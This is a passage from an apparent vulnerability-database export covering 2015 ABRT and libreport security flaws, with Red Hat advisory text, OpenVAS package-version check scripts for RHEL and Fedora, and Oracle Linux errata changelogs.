their\nprivileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an\nsosreport file in ABRT problem directories, and included excerpts of\n/var/log/messages selected by the user-controlled process name, leading to\nan information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic links.\nAn attacker able to create a crafted problem report could use this flaw to\nexpose other parts of ABRT to attack, or to overwrite arbitrary files on\nthe system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus\nservice. A local attacker could use these flaws to read and write arbitrary\nfiles as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check\nthe validity of the problem directory argument in the ChownProblemDir,\nDeleteElement, and DeleteProblem methods. A local attacker could use this\nflaw to take ownership of arbitrary files and directories, or to delete\nfiles and directories as the root user. (CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use this\nflaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages, which\ncorrect these issues.\");\n script_tag(name:\"affected\", value:\"abrt on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1083-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-June/msg00011.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"abrt\", rpm:\"abrt~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-ccpp\", rpm:\"abrt-addon-ccpp~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-kerneloops\", rpm:\"abrt-addon-kerneloops~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-pstoreoops\", rpm:\"abrt-addon-pstoreoops~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-python\", rpm:\"abrt-addon-python~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-vmcore\", rpm:\"abrt-addon-vmcore~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-xorg\", rpm:\"abrt-addon-xorg~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-cli\", rpm:\"abrt-cli~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-console-notification\", rpm:\"abrt-console-notification~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-dbus\", rpm:\"abrt-dbus~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-debuginfo\", rpm:\"abrt-debuginfo~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-desktop\", rpm:\"abrt-desktop~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-gui\", rpm:\"abrt-gui~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-gui-libs\", rpm:\"abrt-gui-libs~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-libs\", rpm:\"abrt-libs~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-python\", rpm:\"abrt-python~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-tui\", rpm:\"abrt-tui~2.1.11~22.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport\", rpm:\"libreport~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-anaconda\", rpm:\"libreport-anaconda~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-cli\", rpm:\"libreport-cli~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-debuginfo\", rpm:\"libreport-debuginfo~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-filesystem\", rpm:\"libreport-filesystem~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-gtk\", rpm:\"libreport-gtk~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-bugzilla\", rpm:\"libreport-plugin-bugzilla~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-mailx\", rpm:\"libreport-plugin-mailx~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-reportuploader\", rpm:\"libreport-plugin-reportuploader~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-rhtsupport\", rpm:\"libreport-plugin-rhtsupport~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-ureport\", rpm:\"libreport-plugin-ureport~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-python\", rpm:\"libreport-python~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-rhel\", rpm:\"libreport-rhel~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-rhel-anaconda-bugzilla\", rpm:\"libreport-rhel-anaconda-bugzilla~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-web\", rpm:\"libreport-web~2.1.11~23.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:28:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for satyr FEDORA-2015-9886", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310869530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869530", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for satyr FEDORA-2015-9886\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869530\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:22:32 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-3315\", \"CVE-2015-3142\", \"CVE-2015-1869\", \"CVE-2015-1870\",\n \"CVE-2015-3151\", \"CVE-2015-3150\", \"CVE-2015-3159\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for satyr FEDORA-2015-9886\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'satyr'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"satyr on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9886\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160571.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"satyr\", rpm:\"satyr~0.18~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:27:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for gnome-abrt FEDORA-2015-9886", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310869534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-abrt FEDORA-2015-9886\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869534\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:22:59 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-3315\", \"CVE-2015-3142\", \"CVE-2015-1869\", \"CVE-2015-1870\",\n \"CVE-2015-3151\", \"CVE-2015-3150\", \"CVE-2015-3159\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gnome-abrt FEDORA-2015-9886\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gnome-abrt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gnome-abrt on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9886\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160568.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-abrt\", rpm:\"gnome-abrt~1.2.0~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:28:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for libreport FEDORA-2015-9886", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310869658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869658", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libreport FEDORA-2015-9886\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869658\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:32:44 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-3315\", \"CVE-2015-3142\", \"CVE-2015-1869\", \"CVE-2015-1870\",\n \"CVE-2015-3151\", \"CVE-2015-3150\", \"CVE-2015-3159\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libreport FEDORA-2015-9886\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libreport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libreport on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9886\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160569.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"libreport\", rpm:\"libreport~2.6.0~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:28:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for gnome-abrt FEDORA-2015-10193", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310869477", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869477", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-abrt FEDORA-2015-10193\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869477\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-01 06:27:35 +0200 (Wed, 01 Jul 2015)\");\n script_cve_id(\"CVE-2015-3315\", \"CVE-2015-3142\", \"CVE-2015-1869\", \"CVE-2015-1870\",\n \"CVE-2015-3151\", \"CVE-2015-3150\", \"CVE-2015-3159\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gnome-abrt FEDORA-2015-10193\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gnome-abrt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gnome-abrt on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-10193\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/161245.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-abrt\", rpm:\"gnome-abrt~1.0.0~3.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:28:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for libreport FEDORA-2015-10193", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310869475", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869475", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libreport FEDORA-2015-10193\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869475\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-01 06:26:25 +0200 (Wed, 01 Jul 2015)\");\n script_cve_id(\"CVE-2015-3315\", \"CVE-2015-3142\", \"CVE-2015-1869\", \"CVE-2015-1870\",\n \"CVE-2015-3151\", \"CVE-2015-3150\", \"CVE-2015-3159\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libreport FEDORA-2015-10193\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libreport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libreport on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-10193\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/161246.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"libreport\", rpm:\"libreport~2.3.0~8.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2021-05-13T09:24:15", "description": "abrt\n[2.0.8-26.0.1.el6_6.1]\n- Add abrt-oracle-enterprise.patch to be product neutral\n- Remove abrt-plugin-rhtsupport dependency for cli and desktop\n- Make abrt Obsoletes/Provides abrt-plugin-rhtsupprot\n[2.0.8-26.el6_6.1]\n- remove old dump directories in upgrade\n- remove outdated rmp scriptlets\n- daemon: allow only root to submit CCpp, Koops, VMCore and Xorg problems\n- abrt-action-install-debuginfo-to-abrt-cache: sanitize arguments and umask\n- make the problem directories owned by abrt and the group root\n- validate uploaded problem directories in abrt-handle-upload\n- don't override nor remove files with user core dump files\n- fix symbolic link and race condition flaws\n- Resolves: #1211966\nlibreport\n[2.0.9-21.0.1.el6_6.1]\n- Add oracle-enterprise.patch and oracle-enterprise-po.patch\n- Remove libreport-plugin-rhtsupport pkg\n[2.0.9-21.el6_6.1]\n- switch dump directory owner from 'abrt:user' to 'user:abrt' (rhbz#1212093)\n- harden against directory traversal, crafted symbolic links (rhbz#1212093)\n- avoid race-conditions in dump dir opening (rhbz#1212093)\n- Resolves: #1211966", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "oraclelinux", "title": "abrt security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-07-07T00:00:00", "id": "ELSA-2015-1210", "href": "http://linux.oracle.com/errata/ELSA-2015-1210.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-13T09:23:48", "description": "abrt\n[2.1.11-22.0.1]\n- Drop libreport-rhel and libreport-plugin-rhtsupport requires\n[2.1.11-22]\n- do not open the build_ids file as the user abrt\n- do not unlink failed and big user core files\n- Related: #1212819, #1216973\n[2.1.11-21]\n- validate all D-Bus method arguments\n- Related: #1214610\n[2.1.11-20]\n- remove the old dump directories during upgrade\n- abrt-action-install-debuginfo-to-abrt-cache: sanitize arguments and umask\n- fix race conditions and directory traversal issues in abrt-dbus\n- use /var/spool/abrt instead of /var/tmp/abrt\n- make the problem directories owned by root and the group abrt\n- validate uploaded problem directories in abrt-handle-upload\n- don't override files with user core dump files\n- fix symbolic link and race condition flaws\n- Resolves: #1211969, #1212819, #1212863, #1212869\n- Resolves: #1214453, #1214610, #1216973, #1218583\nlibreport\n[2.1.11-23.0.1]\n- Update workflow xml for Oracle [18945470]\n- Add oracle-enterprise.patch and oracle-enterprise-po.patch\n- Remove libreport-plugin-rhtsupport and libreport-rhel\n- Added orabug20390725.patch to remove redhat reference [bug 20390725]\n- Added Bug20357383.patch to remove redhat reference [bug 20357383]\n[2.1.11-23]\n- do not open files outside a dump directory\n- Related: #1217484\n[2.1.11-22]\n- switch the default dump dir mode to 0750\n- harden against directory traversal, crafted symbolic 